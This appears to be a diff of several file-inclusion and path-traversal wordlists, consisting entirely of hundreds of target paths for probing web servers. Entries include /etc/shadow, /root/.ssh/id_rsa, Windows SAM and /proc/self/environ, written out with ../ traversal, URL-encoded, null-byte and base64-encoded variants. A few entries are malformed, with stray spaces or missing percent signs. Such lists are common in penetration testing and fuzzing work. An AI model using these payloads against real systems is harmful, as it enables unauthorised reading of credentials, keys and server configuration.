/usr/local/apache2/logs/error.log
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/php.ini
/usr/local/apache/httpd.conf
/usr/local/apache/log
/usr/local/apache/logs
/usr/local/apache/logs/access_log
/usr/local/apache/logs/access_ log
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access. log
../../../../../../../usr/local/apache/logs/access_ log
../../../../../../../usr/local/apache/logs/access. log
../../../../../usr/local/apache/logs/access_log
../../../../../usr/local/apache/logs/access.log
/usr/local/apache/logs/error_log
/usr/local/apache/logs/error.log
../../../../../../../usr/local/apache/logs/error_l og
../../../../../../../usr/local/apache/logs/error.l og
../../../../../usr/local/apache/logs/error_log
../../../../../usr/local/apache/logs/error.log
/usr/local/apps/apache2/conf/httpd.conf
/usr/local/apps/apache/conf/httpd.conf
/usr/local/cpanel/logs
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
/usr/local/etc/apache2/conf/httpd.conf
/usr/local/etc/apache/conf/httpd.conf
/usr/local/etc/apache/vhosts.conf
/usr/local/etc/httpd/conf/httpd.conf
/usr/local/etc/httpd/logs/access_log
/usr/local/etc/httpd/logs/error_log
/usr/local/etc/php.ini
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/httpd/conf/httpd.conf
/usr/local/lib/php.ini
/usr/local/php4/httpd.conf
/usr/local/php4/httpd.conf.php
/usr/local/php4/lib/php.ini
/usr/local/php5/httpd.conf
/usr/local/php5/httpd.conf.php
/usr/local/php5/lib/php.ini
/usr/local/php/httpd.conf
/usr/local/php/httpd.conf.php
/usr/local/php/lib/php.ini
/usr/local/pureftpd/etc/pure-ftpd.conf
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/www/logs/thttpd_log
/usr/local/Zend/etc/php.ini
/usr/pkgsrc/net/pureftpd/
/usr/ports/contrib/pure-ftpd/
/usr/ports/ftp/pure-ftpd/
/usr/ports/net/pure-ftpd/
/usr/sbin/pure-config.pl
/usr/spool/lp/log
/usr/spool/mqueue/syslog
/var/adm
/var/adm/acct/sum/loginlog
/var/adm/aculog
/var/adm/aculogs
/var/adm/crash/unix
/var/adm/crash/vmcore
/var/adm/cron/log
/var/adm/dtmp
/var/adm/lastlog
/var/adm/lastlog/username
/var/adm/log/asppp.log
/var/adm/loginlog
/var/adm/log/xferlog
/var/adm/lp/lpd-errs
/var/adm/messages
/var/adm/pacct
/var/adm/qacct
/var/adm/ras/bootlog
/var/adm/ras/errlog
/var/adm/sulog
/var/adm/SYSLOG
/var/adm/utmp
/var/adm/utmpx
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/X0msgs
/var/apache/log
/var/apache/logs
/var/apache/logs/access_log
/var/apache/logs/error_log
/var/cpanel/cpanel.config
/var/cron/log
/var/lib/mlocate/mlocate.db
/var/lib/mysql/my.cnf
/var/local/www/conf/php.ini
/var/lock/samba
/var/log
/var/log/access_log
/var/log/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../var/log/access_log
/var/log/acct
/var/log/apache2/access_log
/var/log/apache2/access.log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache2/access.log
/var/log/apache2/error_log
/var/log/apache2/error.log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
/var/log/apache/access_log
/var/log/apache/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache/access.log
../../../../../var/log/apache/access_log
../../../../../var/log/apache/access.log
/var/log/apache/error_log
/var/log/apache/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache/error.log
../../../../../var/log/apache/error_log
../../../../../var/log/apache/error.log
/var/log/apache-ssl/access.log
/var/log/apache-ssl/error.log
/var/log/auth
/var/log/authlog
/var/log/auth.log
/var/log/boot.log
/var/log/cron.log
/var/log/dmesg
/var/log/error_log
/var/log/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
../../../../../var/log/error_log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim_rejectlog
/var/log/exim/rejectlog
/var/log/ftplog
/var/log/ftp-proxy
/var/log/ftp-proxy/ftp-proxy.log
/var/log/httpd/
/var/log/httpd/access_log
/var/log/httpd/access.log
../../../../../var/log/httpd/access_log
/var/log/httpd/error_log
/var/log/httpd/error.log
../../../../../var/log/httpd/error_log
/var/log/httpsd/ssl.access_log
/var/log/httpsd/ssl_log
/var/log/kern.log
/var/log/lastlog
/var/log/lighttpd
/var/log/maillog
/var/log/message
/var/log/messages
/var/log/mysqlderror.log
/var/log/mysqld.log
/var/log/mysql.log
/var/log/mysql/mysql-bin.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/log/ncftpd.errs
/var/log/ncftpd/misclog.txt
/var/log/news
/var/log/news.all
/var/log/news/news
/var/log/news/news.all
/var/log/news/news.crit
/var/log/news/news.err
/var/log/news/news.notice
/var/log/news/suck.err
/var/log/news/suck.notice
/var/log/nginx/access_log
/var/log/nginx/access.log
../../../../../../../var/log/nginx/access_log
../../../../../../../var/log/nginx/access.log
../../../../../var/log/nginx/access_log
../../../../../var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log
../../../../../../../var/log/nginx/error_log
../../../../../../../var/log/nginx/error.log
../../../../../var/log/nginx/error_log
../../../../../var/log/nginx/error.log
/var/log/poplog
/var/log/POPlog
/var/log/proftpd
/var/log/proftpd.access_log
/var/log/proftpd.xferlog
/var/log/proftpd/xferlog.legacy
/var/log/pureftpd.log
/var/log/pure-ftpd/pure-ftpd.log
/var/log/qmail
/var/log/qmail/
/var/log/samba
/var/log/samba-log.%m
/var/log/secure
/var/log/smtpd
/var/log/spooler
/var/log/syslog
/var/log/telnetd
/var/log/thttpd_log
/var/log/utmp
/var/log/vsftpd.log
/var/log/wtmp
/var/log/xferlog
/var/log/yum.log
/var/lp/logs/lpNet
/var/lp/logs/lpsched
/var/lp/logs/requests
/var/mysql.log
/var/run/httpd.pid
/var/run/mysqld/mysqld.pid
/var/run/utmp
/var/saf/_log
/var/saf/port/log
/var/spool/errors
/var/spool/locks
/var/spool/logs
/var/spool/tmp
/var/www/conf/httpd.conf
/var/www/html/.htaccess
/var/www/localhost/htdocs/.htaccess
/var/www/log/access_log
/var/www/log/error_log
/../../var/www/logs/access_log
/var/www/logs/access_log
/var/www/logs/access.log
../../../../../../../var/www/logs/access_log
../../../../../../../var/www/logs/access.log
../../../../../var/www/logs/access.log
/var/www/logs/error_log
/var/www/logs/error.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../var/www/logs/error_log
../../../../../var/www/logs/error.log
/var/www/sitename/htdocs/
/var/www/vhosts/sitename/httpdocs/.htaccess
/var/www/web1/html/.htaccess
/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini
/Volumes/webBackup/opt/apache2/conf/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf
/Volumes/webBackup/private/etc/httpd/httpd.conf.default
/web/conf/php.ini
/WINDOWS\php.ini
../../windows/win.ini
/WINNT\php.ini
/..\..\..\..\..\..\winnt\win.ini
/www/logs/proftpd.system.log
/xampp\apache\bin\php.ini
/.Xauthority
..2fapache2flogs2ferror.log
..2fapache2flogs2faccess.log
..2f..2fapache2flogs2ferror.log
..2f..2fapache2flogs2faccess.log
..2f..2f..2fapache2flogs2ferror.log
..2f..2f..2fapache2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2facces.log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fetc2fhttpd2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2faccess.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess_ log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2faccess. log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2faccess.log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2fwww2flogs2ferror.log
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror_l og
..2f..2f..2f..2f..2f..2f..2fusr2flocal2fapache2flogs2ferror.l og
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache2ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2fapache22ferror.log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror_log
..2f..2f..2f..2f..2f..2f..2fvar2flog2ferror.log
..2fetc2fpasswd
..2fetc2fpasswd%00
..2f..2fetc2fpasswd
..2f..2fetc2fpasswd%00
..2f..2f..2fetc2fpasswd
..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fpasswd%00
..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2f..2fetc2fshadow%00
L2V0Yy9tYXN0ZXIucGFzc3dk
L21hc3Rlci5wYXNzd2Q=
ZXRjL3Bhc3N3ZA==
ZXRjL3NoYWRvdyUwMA==
L2V0Yy9wYXNzd2Q=
L2V0Yy9wYXNzd2QlMDA=
Li4vZXRjL3Bhc3N3ZA==
Li4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZCUwMA==
Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3NoYWRvdyUwMA==


@ -0,0 +1,39 @@
/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35


@ -0,0 +1,69 @@
php://input
C:\boot.ini
C:\WINDOWS\win.ini
C:\WINDOWS\php.ini
C:\WINDOWS\System32\Config\SAM
C:\WINNT\php.ini
C:\xampp\phpMyAdmin\config.inc
C:\xampp\phpMyAdmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc
C:\xampp\phpmyadmin\phpinfo.php
C:\xampp\phpmyadmin\config.inc.php
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\apache\conf\httpd.conf
C:\xampp\FileZillaFTP\FileZilla Server.xml
C:\xampp\MercuryMail\mercury.ini
C:\mysql\bin\my.ini
C:\xampp\php\php.ini
C:\xampp\phpMyAdmin\config.inc.php
C:\xampp\tomcat\conf\tomcat-users.xml
C:\xampp\tomcat\conf\web.xml
C:\xampp\sendmail\sendmail.ini
C:\xampp\webalizer\webalizer.conf
C:\xampp\webdav\webdav.txt
C:\xampp\apache\logs\error.log
C:\xampp\apache\logs\access.log
C:\xampp\FileZillaFTP\Logs
C:\xampp\FileZillaFTP\Logs\error.log
C:\xampp\FileZillaFTP\Logs\access.log
C:\xampp\MercuryMail\LOGS\error.log
C:\xampp\MercuryMail\LOGS\access.log
C:\xampp\mysql\data\mysql.err
C:\xampp\sendmail\sendmail.log
C:\apache\log\error.log
C:\apache\log\access.log
C:\apache\log\error_log
C:\apache\log\access_log
C:\apache2\log\error.log
C:\apache2\log\access.log
C:\apache2\log\error_log
C:\apache2\log\access_log
C:\log\error.log
C:\log\access.log
C:\log\error_log
C:\log\access_log
C:\apache\logs\error.log
C:\apache\logs\access.log
C:\apache\logs\error_log
C:\apache\logs\access_log
C:\apache2\logs\error.log
C:\apache2\logs\access.log
C:\apache2\logs\error_log
C:\apache2\logs\access_log
C:\logs\error.log
C:\logs\access.log
C:\logs\error_log
C:\logs\access_log
C:\log\httpd\access_log
C:\log\httpd\error_log
C:\logs\httpd\access_log
C:\logs\httpd\error_log
C:\opt\xampp\logs\access_log
C:\opt\xampp\logs\error_log
C:\opt\xampp\logs\access.log
C:\opt\xampp\logs\error.log
C:\Program Files\Apache Group\Apache\logs\access.log
C:\Program Files\Apache Group\Apache\logs\error.log
C:\Program Files\Apache Group\Apache\conf\httpd.conf
C:\Program Files\Apache Group\Apache2\conf\httpd.conf
C:\Program Files\xampp\apache\conf\httpd.conf


@ -0,0 +1,62 @@
/etc/passwd
/etc/group
/etc/hosts
/etc/motd
/etc/issue
/etc/bashrc
/etc/apache2/apache2.conf
/etc/apache2/ports.conf
/etc/apache2/sites-available/default
/etc/httpd/conf/httpd.conf
/etc/httpd/conf.d
/etc/httpd/logs/access.log
/etc/httpd/logs/access_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log
/etc/init.d/apache2
/etc/mysql/my.cnf
/etc/nginx.conf
/opt/lampp/logs/access_log
/opt/lampp/logs/error_log
/opt/lamp/log/access_log
/opt/lamp/logs/error_log
/proc/self/environ
/proc/version
/proc/cmdline
/proc/mounts
/proc/config.gz
/root/.bashrc
/root/.bash_history
/root/.ssh/authorized_keys
/root/.ssh/id_rsa
/root/.ssh/id_rsa.keystore
/root/.ssh/id_rsa.pub
/root/.ssh/known_hosts
/usr/local/apache/htdocs/index.html
/usr/local/apache/conf/httpd.conf
/usr/local/apache/conf/extra/httpd-ssl.conf
/usr/local/apache/logs/error_log
/usr/local/apache/logs/access_log
/usr/local/apache/bin/apachectl
/usr/local/apache2/htdocs/index.html
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/logs/error_log
/usr/local/apache2/logs/access_log
/usr/local/apache2/bin/apachectl
/usr/local/etc/nginx/nginx.conf
/usr/local/nginx/conf/nginx.conf
/var/apache/logs/access_log
/var/apache/logs/access.log
/var/apache/logs/error_log
/var/apache/logs/error.log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/httpd/error_log
/var/log/httpd/access_log
/var/log/nginx/access_log
/var/log/nginx/access.log
/var/log/nginx/error_log
/var/log/nginx/error.log


@ -0,0 +1,911 @@
\apache2\log\access_log
\apache2\log\access.log
\apache2\log\error_log
\apache2\log\error.log
/apache2/logs/access.log
/apache2/logs/access.log
\apache2\logs\access_log
\apache2\logs\access.log
/apache2/logs/access.log%00
/apache2/logs/error.log
/apache2/logs/error.log
\apache2\logs\error_log
\apache2\logs\error.log
/apache2/logs/error.log%00
\apache\log\access_log
\apache\log\access.log
\apache\log\error_log
\apache\log\error.log
/apache/logs/access.log
/apache/logs/access.log
/apache/logs/access.log
\apache\logs\access_log
\apache\logs\access.log
/apache/logs/access.log%00
/apache/logs/error.log
/apache/logs/error.log
/apache/logs/error.log
\apache\logs\error_log
\apache\logs\error.log
/apache/logs/error.log%00
/apache\php\php.ini
/apache\php\php.ini
/apache\php\php.ini%00
/bin/php.ini
/bin/php.ini
/bin/php.ini%00
c:\apache\php\php.ini
C:\apache\php\php.ini
C:\boot.ini
c:\home2\bin\stable\apache\php.ini
C:\home2\bin\stable\apache\php.ini
c:\home\bin\stable\apache\php.ini
C:\home\bin\stable\apache\php.ini
C:\MySQL\data\hostname.err
C:\MySQL\data\mysql-bin.log
C:\MySQL\data\mysql.err
C:\MySQL\data\mysql.log
C:\MySQL\my.cnf
C:\MySQL\my.ini
c:\NetServer\bin\stable\apache\php.ini
c:\php4\php.ini
C:\php4\php.ini
C:\php4\sessions\
c:\php5\php.ini
C:\php5\php.ini
C:\php5\sessions\
c:\php\php.ini
c:\PHP\php.ini
C:\php\php.ini
C:\php\sessions\
C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf
C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf
C:\ProgramFiles\ApacheGroup\Apache\logs\access.log
C:\ProgramFiles\ApacheGroup\Apache\logs\error.log
C:\ProgramFiles\MySQL\data\hostname.err
C:\ProgramFiles\MySQL\data\mysql-bin.log
C:\ProgramFiles\MySQL\data\mysql.err
C:\ProgramFiles\MySQL\data\mysql.log
C:\ProgramFiles\MySQL\my.cnf
C:\ProgramFiles\MySQL\my.ini
C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err
C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log
C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf
C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini
C:\ProgramFiles\xampp\apache\conf\httpd.conf
c:\WINDOWS\php.ini
C:\WINDOWS\php.ini
C:\WINDOWS\Repair\SAM
C:\WINDOWS\TEMP\
C:\WINDOWS\win.ini
c:\WINNT\php.ini
C:\WINNT\php.ini
C:\WINNT\win.ini
c:\xampp\apache\bin\php.ini
C:\xampp\apache\bin\php.ini
etc%2fpasswd
etc%2fpasswd%00
etc%5cpasswd
etc%5cpasswd%00
/etc/apache2/apache2.conf
/etc/apache2.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf
/etc/apache2/conf/httpd.conf%00
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf
/etc/apache2/httpd.conf%00
/etc/apache2/sites-available/default
/etc/apache2/sites-enabled/000-default
/etc/apache/apache.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf
/etc/apache/conf/httpd.conf%00
/etc/apache/httpd.conf
etc%c0%afpasswd
etc%c0%afpasswd%00
/etc/chrootUsers
/etc/chrootUsers
/etc/chrootUsers%00
/etc/crontab
/etc/fstab
/etc/ftpchroot
/etc/ftpchroot
/etc/ftpchroot%00
/etc/ftphosts
/etc/ftphosts
/etc/ftphosts%00
/etc/group
/etc/group
/etc/group%00
/etc/hosts
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf
/etc/http/conf/httpd.conf%00
/etc/httpd.conf
/etc/httpd.conf
/etc/httpd.conf%00
/etc/httpd/conf.d/php.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf
/etc/httpd/conf/httpd.conf%00
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf
/etc/httpd/httpd.conf%00
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces_log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces.log
/etc/httpd/logs/acces_log%00
/etc/httpd/logs/acces.log%00
/etc/httpd/logs/access_log
/etc/httpd/logs/access.log
/etc/httpd/logs/access.log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error_log
/etc/httpd/logs/error.log
/etc/httpd/logs/error.log
/etc/httpd/logs/error_log%00
/etc/httpd/logs/error.log%00
/etc/httpd/php.ini
/etc/httpd/php.ini
/etc/httpd/php.ini%00
/etc/http/httpd.conf
/etc/http/httpd.conf
/etc/http/httpd.conf%00
